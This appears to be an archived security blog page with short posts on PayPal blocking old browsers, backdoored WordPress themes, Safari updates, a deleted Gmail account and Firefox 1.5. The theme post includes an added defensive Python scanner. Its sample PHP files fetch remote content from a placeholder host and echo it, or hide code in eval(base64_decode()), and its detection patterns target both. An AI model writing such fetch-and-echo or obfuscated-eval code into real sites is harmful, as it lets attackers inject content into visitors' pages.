security

For once, I'm wishing more sites were like PayPal

I'm not a fan of PayPal, with its poor customer service (which is a huge deal when it comes to handling money), but I'm with them on this:

Web payment firm Paypal has said it will block "unsafe browsers" from using its service as part of wider anti-phishing efforts....

...Paypal said it was "an alarming fact that there is a significant set of users who use very old and vulnerable browsers such as Internet Explorer 4"....

...Paypal said some users were still using Internet Explorer 3, released more than 10 years ago.

IE3?? Holy cow! I don't even think that's loaded on my old IBM Intellistation that's collecting dust in the corner.

Here's a surprise to me:

Paypal said it supported the use of Extended Validation SSL Certificates....

...The latest version of Internet Explorer supports EV SSL certificates, while Firefox 2 supports it with an add-on but Apple's Safari browser for Mac and PCs does not.

(Emphasis added.)

A cautionary tale regarding theme download sites

Via GigaOM:

Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....

...There are lots of reasons a hacker may want to inject code into a page:

  • To infect visitors by exploiting a browser vulnerability
  • To place ads they can then get revenue from
  • To embed links to blogs they own, improving their page rank
  • To entice people to click on links that lead them elsewhere

The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.
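The theme backdoor described in the excerpt above fetched content from a remote server on every page load and wrote whatever came back into the page. As an added example (not code from GigaOM or from this blog), here is a small Python scanner a site owner could run over a downloaded theme's PHP files before installing it; the sample file contents and the match rules are constructed for illustration, and a line-based check like this catches the plain form of the trick, not every obfuscation.

```python
import re

# Constructed sample theme files (illustrative, not real theme code): a clean
# footer, one that fetches and echoes remote content on every page load, and
# one that hides its logic behind eval(base64_decode()).
SAMPLE_THEME_FILES = {
    "clean/footer.php": "<?php wp_footer(); ?>\n<p>&copy; 2008 Example Blog</p>",
    "shady/footer.php": "<?php\n$c = file_get_contents('http://example.invalid/feed.txt');\n"
                        "if ($c) { echo $c; }\n?>",
    "shady/functions.php": "<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>",
}

# Single-line rules: (finding name, pattern). Neither belongs in a template file.
RULES = [
    ("remote-fetch", re.compile(r"\b(file_get_contents|fopen|curl_init)\s*\(\s*['\"]https?://", re.I)),
    ("obfuscated-eval", re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
]
# A variable holding the body of a remote URL, tracked to catch fetch-then-echo across lines.
ASSIGN_REMOTE = re.compile(r"(\$\w+)\s*=\s*(?:file_get_contents|fopen)\s*\(\s*['\"]https?://", re.I)

def scan_source(path, source):
    """Return (path, line number, finding) tuples for one PHP file."""
    findings = []
    fetched_vars = set()
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((path, lineno, name))
        match = ASSIGN_REMOTE.search(line)
        if match:
            fetched_vars.add(match.group(1))
        # Remote content written into the page (or executed) is the injection point.
        for var in fetched_vars:
            if re.search(r"\b(echo|print|eval)\s*\(?\s*" + re.escape(var) + r"\b", line):
                findings.append((path, lineno, "output-of-remote-content"))
    return findings

def scan_theme(files):
    """Scan a mapping of relative path -> PHP source for a whole theme."""
    findings = []
    for path, source in sorted(files.items()):
        findings.extend(scan_source(path, source))
    return findings

if __name__ == "__main__":
    for path, lineno, name in scan_theme(SAMPLE_THEME_FILES):
        print(f"{path}:{lineno}: {name}")
```

To run it on a real theme, read each .php file under the theme directory into the mapping in place of the constructed samples.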

Fear of the white hat

Via MacWorld:

“This is not good; this is a security risk,” he said. “We’re a bank.”

Wilson said it has taken him the better part of a week to remove Safari from his network and prevent it from being reinstalled.

In an e-mail interview, Susan Bradley agreed that the updates are creating a problem for administrators and making users less secure. “It impacts all of us when more potential attack surface is installed in a group of folks that are vulnerable enough as it is,” said Bradley, who is chief technology officer with Tamiyasu, Smith, Horn and Braun, Accountancy Corp.

Of course I don't have any stats, but I wonder how many of these IT folks are the same ones keeping IE6 alive.

Another case of the inherent vulnerability of centralized apps

In short:

You don't own it = you don't control it.

If your stuff is on someone else's turf, you have to realize that you are at an inherent disadvantage when conflict arises. They say possession is 9/10ths of the law. That is as true on the internet as it is in the "real world."

Consider Bob, who discovered that Google went and deleted his entire GMail account without warning.

...By then I sensed that something was terribly wrong, as the Google folks rarely took > 12 hours to fix such a problem. I accessed the Google Accounts page (www.google.com/accounts/), and saw the following message:

The account you attempted to access has been deleted. You may click here to sign up for a new account.

A nightmare come true?! I tried logging into my Google Account via www.google.com/accounts/Login but was presented with an invalid username/password error.

1.5 reasons to try Firefox

If you haven't been running one of the release candidates already, you may want to get the latest and perhaps best browser to date, Firefox 1.5, now that it's been officially released. And really, if you're using another browser -- especially the buggy and unsafe Internet Explorer -- you owe it to yourself to at least try Firefox, which is safer for your machine.

That's reason one.

As a designer, Firefox is a pleasurable development in the online world. I can't speak for others, but I think websites look better in Firefox. Meanwhile, Internet Explorer, thanks to Microsoft's defiance of web standards, continues to be a nightmare for web designers, who waste additional hours upon hours hacking around Internet Explorer's CSS quirks so that IE doesn't break the website altogether.
